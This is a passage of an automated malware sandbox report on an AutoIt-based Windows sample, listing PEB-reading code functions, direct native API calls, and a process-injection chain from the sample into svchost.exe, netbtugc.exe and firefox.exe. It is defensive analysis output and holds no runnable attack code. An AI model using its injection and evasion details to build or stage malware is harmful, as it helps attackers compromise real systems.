            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]2_2_035C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]2_2_035365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]2_2_035325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]2_2_0356E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]2_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]2_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]2_2_03564588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA456 mov eax, dword ptr fs:[00000030h]2_2_035EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]2_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]2_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]2_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]2_2_0356A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]2_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]2_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA49A mov eax, dword ptr fs:[00000030h]2_2_035EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]2_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]2_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]2_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528B50 mov eax, dword ptr fs:[00000030h]2_2_03528B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEB50 mov eax, dword ptr fs:[00000030h]2_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]2_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]2_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]2_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]2_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]2_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604B00 mov eax, dword ptr fs:[00000030h]2_2_03604B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]2_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]2_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]2_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]2_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]2_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEA60 mov eax, dword ptr fs:[00000030h]2_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]2_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]2_2_0356CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]2_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]2_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exe; code functions that read the PEB pointer out of the TEB (mov <reg>, dword ptr fs:[00000030h]). The number in parentheses is how many such reads the function contains, followed by the destination register(s):
            2_2_03530AD0 (1, eax)
            2_2_03564AD0 (2, eax)
            2_2_03586ACC (3, eax)
            2_2_0356AAEE (2, eax)
            2_2_03568A90 (1, edx)
            2_2_0353EA80 (9, eax)
            2_2_03604A80 (1, eax)
            2_2_03538AA0 (2, eax)
            2_2_03586AA4 (1, eax)
            2_2_035B0946 (1, eax)
            2_2_03604940 (1, eax)
            2_2_035D4978 (2, eax)
            2_2_035BC97C (1, eax)
            2_2_03556962 (3, eax)
            2_2_0357096E (3: eax, edx, eax)
            2_2_035BC912 (1, eax)
            2_2_03528918 (2, eax)
            2_2_035AE908 (2, eax)
            2_2_035B892A (1, eax)
            2_2_035C892B (1, eax)
            2_2_0353A9D0 (6, eax)
            2_2_035649D0 (1, eax)
            2_2_035FA9D3 (1, eax)
            2_2_035C69C0 (1, eax)
            2_2_035629F9 (2, eax)
            2_2_035BE9E0 (1, eax)
            2_2_035B89B3 (3: esi, eax, eax)
            2_2_035429A0 (13, eax)
            2_2_035309AD (2, eax)
            2_2_03560854 (1, eax)
            2_2_03534859 (2, eax)
            2_2_03542840 (1, ecx)
            2_2_035BE872 (2, eax)
            2_2_035C6870 (2, eax)
            2_2_035BC810 (1, eax)
            2_2_03552835 (1, eax)
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C70B62: GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C42622: IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C3083F: IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C309D5: SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C30C21: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe; native API calls issued directly, in the order recorded. "Direct from" is the address the sandbox recorded the call as originating from:
            NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            NtQueryAttributesFile: Direct from: 0x76EF2E6C
            NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            NtQuerySystemInformation: Direct from: 0x76EF48CC
            NtOpenSection: Direct from: 0x76EF2E0C
            NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            NtQueryValueKey: Direct from: 0x76EF2BEC
            NtQueryInformationToken: Direct from: 0x76EF2CAC
            NtCreateFile: Direct from: 0x76EF2FEC
            NtOpenFile: Direct from: 0x76EF2DCC
            NtTerminateThread: Direct from: 0x76EF2FCC
            NtOpenKeyEx: Direct from: 0x76EF2B9C
            NtSetInformationProcess: Direct from: 0x76EF2C5C
            NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            NtNotifyChangeKey: Direct from: 0x76EF3C2C
            NtCreateMutant: Direct from: 0x76EF35CC
            NtResumeThread: Direct from: 0x76EF36AC
            NtMapViewOfSection: Direct from: 0x76EF2D1C
            NtClose: Direct from: 0x76EE7B2E
            NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            NtQuerySystemInformation: Direct from: 0x76EF2DFC
            NtReadFile: Direct from: 0x76EF2ADC
            NtDelayExecution: Direct from: 0x76EF2DDC
            NtQueryInformationProcess: Direct from: 0x76EF2C26
            NtResumeThread: Direct from: 0x76EF2FBC
            NtCreateUserProcess: Direct from: 0x76EF371C
            NtOpenKeyEx: Direct from: 0x76EF3C9C
            NtWriteVirtualMemory: Direct from: 0x76EF490C
            NtSetInformationThread: Direct from: 0x76EE63F9
            NtClose: Direct from: 0x76EF2B6C
            NtSetInformationThread: Direct from: 0x76EF2B4C
            NtReadVirtualMemory: Direct from: 0x76EF2E8C
            NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; Section loaded: NULL; target: C:\Windows\SysWOW64\svchost.exe; protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL; target: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe; protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL; target: C:\Windows\SysWOW64\netbtugc.exe; protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe; Section loaded: NULL; target: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe; protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe; Section loaded: NULL; target: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe; protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe; Section loaded: NULL; target: C:\Program Files\Mozilla Firefox\firefox.exe; protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe; Section loaded: NULL; target: C:\Program Files\Mozilla Firefox\firefox.exe; protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe; Thread register set: target process: 6568
            Source: C:\Windows\SysWOW64\netbtugc.exe; Thread APC queued: target process: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; Memory written: C:\Windows\SysWOW64\svchost.exe base: 28E4008
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C71201: LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C52BA5: SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C7B226: SendInput, keybd_event
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C922DA: GetForegroundWindow, GetDesktopWindow, GetWindowRect, mouse_event, GetCursorPos, mouse_event
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe"
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe; Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C70B62: GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe; code function 0_2_00C71663: AllocateAndInitializeSid, CheckTokenMembership, FreeSid
            Source: BP-50C26_20241220_082241.exe; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4507202262.0000000001411000.00000002.00000001.00040000.00000000.sdmp; gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111646852.0000000001411000.00000002.00000001.00040000.00000000.sdmp; gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000000.2259883925.00000000013D1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
            Source: BP-50C26_20241220_082241.exe; gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4507202262.0000000001411000.00000002.00000001.00040000.00000000.sdmp; gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111646852.0000000001411000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4507202262.0000000001411000.00000002.00000001.00040000.00000000.sdmp; gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111646852.0000000001411000.00000002.00000001.00040000.00000000.sdmp; gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000000.2259883925.00000000013D1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
